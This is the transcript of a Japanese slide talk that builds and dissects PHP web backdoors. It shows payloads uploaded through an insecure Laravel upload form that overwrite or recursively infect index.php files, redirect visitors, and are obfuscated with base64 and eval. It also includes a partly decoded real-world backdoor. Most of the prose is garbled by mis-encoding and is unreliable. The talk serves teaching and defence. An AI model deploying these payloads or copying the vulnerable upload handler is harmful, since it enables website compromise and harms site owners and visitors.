Upgrade to Pro — share decks privately, control downloads, hide ads and more …

作って理解するバックドア

Roku
March 23, 2023

 作って理解するバックドア

Roku

March 23, 2023
Tweet

More Decks by Roku

Other Decks in Technology

Transcript

  1. ࣮ԋ w ѱ͍ਓ͕ϑΝΠϧ͕͜ΜͳϑΝΠϧΛΞοϓϩʔυ͠·ͨ͠ɻ 
 
 SFXSJUFJOEFYQIQ <?php $path = __DIR__

    . '/../../../public/index.php'; $code = "<?php die('you have been hacked :)');"; file_put_contents($path, $code); die('success');
  2. ߈ܸ༻ϑΝΠϧ͍Ζ͍Ζ w ΋ͬͱλνѱ͍΍ͭɻ <?php $path = __DIR__ . '/../../../public/index.php'; $code

    = "<?php header('Location: https://ad5.jp');"; file_put_contents($path, $code); die('success');
  3. ͖ͬ͞ͷαϯϓϧ <?php $path = __DIR__ . '/../../../public/index.php'; $code = "<?php

    header('Location: https://ad5.jp');"; file_put_contents($path, $code); die('success');
  4. ͖ͬ͞ͷαϯϓϧ <?php $path = __DIR__ . '/../../../public/index.php'; $code = "<?php

    header('Location: https://ad5.jp');"; file_put_contents($path, $code); die('success'); ͜Μͳվ͟ΜͳΒ·ͩϚγɻ
  5. άϨʔυΞοϓ <?php $code = <<<'EOM' <?php if (empty($_SESSION) && empty($_COOKIE))

    { header('Location: https://ad5.jp'); } ?> EOM; $path = __DIR__ . '/../../../public/index.php'; $code .= file_get_contents($path, $code); file_put_contents($path, $code);
  6. άϨʔυΞοϓ <?php $code = <<<'EOM' <?php if (empty($_SESSION) && empty($_COOKIE))

    { header('Location: https://ad5.jp'); } ?> EOM; $path = __DIR__ . '/../../../public/index.php'; $code .= file_get_contents($path, $code); file_put_contents($path, $code); ؅ཧऀ΍։ൃऀ͕ؾ͔ͮͳ͍͏ͪʹɺ ৽ن๚໰ऀ͚͕ͩඈ͹͞Εଓ͚Δɻ
  7. HMPC Λ࢖ͬͯ૯౰ͨΓ <?php function prepend($path) { $code .= file_get_contents($path, “…߈ܸ༻ίʔυ…”);

    file_put_contents($path, $code); } function prependRecursive($path) { if (file_exists("{$path}/index.php")) { prepend("{$path}/index.php"); } foreach (glob("{$path}/*") as $child) { if (is_dir($child)) { prependRecursive($child); } } } prependRecursive($_SERVER["DOCUMENT_ROOT"]);
  8. ྫ͑͹͜ͷίʔυ <?php $path = __DIR__ . '/../../../public/index.php'; $code = "<?php

    header('Location: https://ad5.jp');"; file_put_contents($path, $code);
  9. ͜͏ͯ͠ <?php eval("$path = __DIR__ . '/../../../public/index.php'; $code = \"<?php

    header('Location: https://ad5.jp'); \";file_put_contents($path, $code)");
  10. 1)1͞Μ͸ॊೈͳΜͰ͢ɻ <?php $x = '0123456789abcdefghijklmnopqrstuvwxyz_'; $a = $x[14].$x[31].$x[10].$x[21]; $b =

    $x[11].$x[10].$x[28].$x[14].$x[6].$x[4].$x[36]. $x[13].$x[14].$x[12].$x[24].$x[13].$x[14]; $a($b("JHBhdGggPSBfX0RJUl9fIC4gJy8uLi8uLi8uLi9wdWJsaWMv aW5kZXgucGhwJzskY29kZSA9IFwiPD9waHAgaGVhZGVyKCdMb2NhdGl vbjogaHR0cHM6Ly9hZDUuanAnKTtcIjtmaWxlX3B1dF9jb250ZW50cy gkcGF0aCwgJGNvZGUp"));
  11. ˞͓அΓ w ઌఔͷίʔυ͸̍఺ӕ͕͋Γ·͢ɻ 
 FWBM͸ؔ਺Ͱ͸ͳ͘ݴޠߏ଄ͷͨΊɺ 
 
 
 ͸ಈ͖·ͤΜɻ w

    ࣮ࡍͷஈ໨ͷ೉ಡԽʹ͸ɺ 
 DSFBUF@GVODUJPO ؔ਺ 1)1 ͕࢖ΘΕ͍ͯΔ΋ͷ͕ 
 ଟ͘ݟΒΕ·ͨ͠ɻ $a = "eval"; $a();
  12. ࣮ࡍʹ࠾ूͨ͠όοΫυΞ MPDBMFQIQ ˞໿ CZUF <?php $tJvyYsXGpmgwi='y(3;]whcx)8$4mb dk1qog5sprlua=z_/ 0i9tvf_”76*.2n[je';$q2866=$tJvyYsXGpmgwi[(105/15)]. $tJvyYsXGpmgwi[(26-1)].$tJvyYsXGpmgwi[(1*49)]. $tJvyYsXGpmgwi[((10*1)+18)].$tJvyYsXGpmgwi[(14+22)].

    $tJvyYsXGpmgwi[(44+5)].$tJvyYsXGpmgwi[(44-13)].$tJvyYsXGpmgwi[(684/18)]. $tJvyYsXGpmgwi[(23+4)].$tJvyYsXGpmgwi[(72-(33-7))]. $tJvyYsXGpmgwi[(154/22)].$tJvyYsXGpmgwi[(11+25)].$tJvyYsXGpmgwi[(65- (62-31))].$tJvyYsXGpmgwi[(26-6)].$tJvyYsXGpmgwi[((27*2)-8)]; $pHFdNhg9688=$tJvyYsXGpmgwi[(20-9)].$tJvyYsXGpmgwi[(2*4)]. $tJvyYsXGpmgwi[(29*1)].$tJvyYsXGpmgwi[(160/4)]; $MYtraky2482=$tJvyYsXGpmgwi[(8*5)].$tJvyYsXGpmgwi[((1+0)+2)]. $tJvyYsXGpmgwi[(6+(1*(95/19)))].$tJvyYsXGpmgwi[(140/5)]. $tJvyYsXGpmgwi[(522/18)].$tJvyYsXGpmgwi[(7*((7-3)-2))]. …ུ…
  13. EFDPEF͢Δͱɻ <?php error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $xmlname = 'mapss.xml'; $dt =

    0; $sitemap_file = 'sitemap'; $mapnum = 2000; if(isset($_GET['dt'])){ $dt = $_GET['dt']; } $site = @$_GET['smsite']; $jdir = ''; $http_web = 'http'; if(is_https()){ $http = 'https'; }else{ …ུ…
  14. MPDBMFQIQͷಛ௃ w (PPHMFʹِͷαΠτϚοϓ౳Λૹ͍ͬͯΔɻ 
 ˠ4FBSDI$POTPMF΍ݕࡧ݁ՌͷΞϥʔτʹΑΓɺ 
 ɹӡӦऀ΍Ϣʔβʹؾ͔ͮΕΔͷΛ๷͙ͨΊɻ w $44΍ը૾౳ͷೖͬͨσΟϨΫτϦΛૂ͍ͬͯΔɻ w

    ϑΝΠϧʹॻ͖ࠐΉ಺༰Λ֎෦63-͔Βऔಘ͍ͯ͠Δɻ 
 ˠ͓ͦΒ͘߈ܸऀͷ࢘ྩ༻αʔόɻ͜ͷ಺༰Λมߋ͢Δ͜ͱͰ 
 ɹ߈ܸ༻ϑΝΠϧΛมߋͤͣͱ΋ɺ߈ܸ಺༰Λม͑ΒΕΔɻ
  15. ࣮ԋʹ࢖༻͓ͨ͠໰͍߹ΘͤϑΥʔϜ public function goConfirm(InquiryRequest $request) : RedirectResponse { $data =

    $request->input(); $saving_path = storage_path('app/public/' . $_FILES['file']['name']); move_uploaded_file($_FILES['file']['tmp_name'], $saving_path); chmod($saving_path, 0755); $data['file_name'] = $_FILES['file']['name']; $data['file_url'] = url('storage/', $_FILES['file']['name']); session()->put('inquiry', $data); return redirect()->route('confirm'); }
  16. ͡Ό͋ɺ͜Ε͸҆શͰ͔͢ʁ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

    $request->file(‘file'); $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']); //ུ }
  17. ͡Ό͋ɺ͜Ε͸҆શͰ͔͢ʁ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

    $request->file(‘file'); $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']); //ུ } ݁࿦͔Βݴ͑͹ɺ΄ͱΜͲͷ৚݅ԼͰ͸ηʔϑͰ͢ɻ Կނηʔϑͳͷ͔ɺͲ͏͍͏৚݅ԼͰةݥͳͷ͔ɺ ౴͑ΒΕ·͔͢ʁ
  18. ͡Ό͋͜Ε͸Ͳ͏ͳͷ͔ʁ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

    $request->file(‘file'); $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']); //ུ }
  19. ͡Ό͋͜Ε͸Ͳ͏ͳͷ͔ʁ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

    $request->file(‘file'); $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']); //ུ } σϑΥϧτͰ͸ɺQIQϑΝΠϧΛΞοϓϩʔυͨ͠৔߹ɺ ֦ுࢠͳ͠ʹͳΔɻ
  20. 6QMPBEFE'JMFTUPSF ͷ࣮૷ 6QMPBEFE'JMFIBTI/BNF ʹΑΓϑΝΠϧ໊͕ܾఆ͞ΕΔɻ 
 ֦ுࢠ͸ɺ'JMFHVFTT&YUFOUJPO ʹΑܾͬͯΊΒΕΔɻ 
 1)1ϑΝΠϧΛΞοϓϩʔυͨ͠৔߹ɺ.JNF5ZQF͸ 


    UFYUYQIQͱͳΓɺ.JNF5ZQF."1ͷఆٛʹै͍ɺ 
 ֦ுࢠͳ͠Ͱ֨ೲ͞ΕΔɻ 6QMPBEFE'JMFʜ*MMVNJOBUFa)UUQa6QMPBEFE'JMF 
 'JMFʜ4ZNGPOZa$PNQPOFOUa)UUQ'PVOEBUJPOa'JMFa'JMF 
 .JNF5ZQFTʜ4ZNGPOZa$PNQPOFOUa.JNFa.JNF5ZQFT
  21. ͜Μͳ࣮૷΋ɺ΍Γ͕ͪɻ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

    $request->file(‘file'); $filename = Carbon::now()->format(‘Ymd_His.') . $uploaded_file->getClientOriginalExtension(); $path = $uploaded_file->storePubliclyAs('upload', $filename , ['disk' => 'public']); //ུ } ϑΝΠϧ໊ʹ೔෇΍*%౳ͷϧʔϧΛ࣋ͨͤͯอଘ͢Δ৔߹ɻ HFU$MJFOU0SJHJOBM&YUFOTJPO ΑΓHVFTT&YUFOUJPO
  22. ͡Ό͋͜Ε͸Ͳ͏ͳͷ͔ʁ public function goConfirm(InquiryRequest $request) : RedirectResponse { $uploaded_file =

    $request->file(‘file'); $path = $uploaded_file->storePublicly('upload', ['disk' => 'public']); //ུ }
  23. 6QMPBEFE'JMFTUPSF ͷ࣮૷ ιʔείʔυϦʔσΟϯά͸ׂѪ͠·͕͢ɾɾɾ ઃఆϑΝΠϧDPO fi H fi MFTZTUFNTQIQ 
 ͷEJTLTQVCMJDQFSNJTTJPOTͷઃఆʹґଘ͠·͢ɻ

    σϑΥϧτͰ͸ɺσΟϨΫτϦ͸·ͨ͸ʹɺ 
 ϑΝΠϧ͸·ͨ͸ʹͳ͍ͬͯ·͢ɻ ˠ͜ͷઃఆΛมߋ͍ͯ͠ͳ͍ݶΓ͸ɺ 
 ɹલड़ͷίʔυ͸ύʔϛογϣϯʹͳΓ·͢ɻ
  24. ͪͳΈʹ͜ͷ৔߹ public function goConfirm(InquiryRequest $request) : RedirectResponse { $data =

    $request->input(); $saving_path = storage_path('app/public/' . $_FILES['file']['name']); move_uploaded_file($_FILES['file']['tmp_name'], $saving_path); //ུ } ύʔϛογϣϯ͸Ͳ͏ͳΔ͔ɺ౴͑ΒΕ·͔͢ʁ
  25. GJMF@QVU@DPOUFOU ౳ͷύʔϛογϣϯ w 04ͷઃఆʢVNBTLʣʹґଘ͠·͢ɻ 
 ଟ͘ͷ؀ڥͰ͸ɺσΟϨΫτϦ͸ ·ͨ͸ ɺ 
 ϑΝΠϧ͸

    ·ͨ͸ Ͱ͢ɻ w 04ͷઃఆʹ΋ґଘ͢΂͖Ͱ͸ͳ͘ɺΞϓϦέʔγϣϯ಺Ͱ 
 ໌ࣔతʹରॲ͢΂͖Ͱ͢ɻ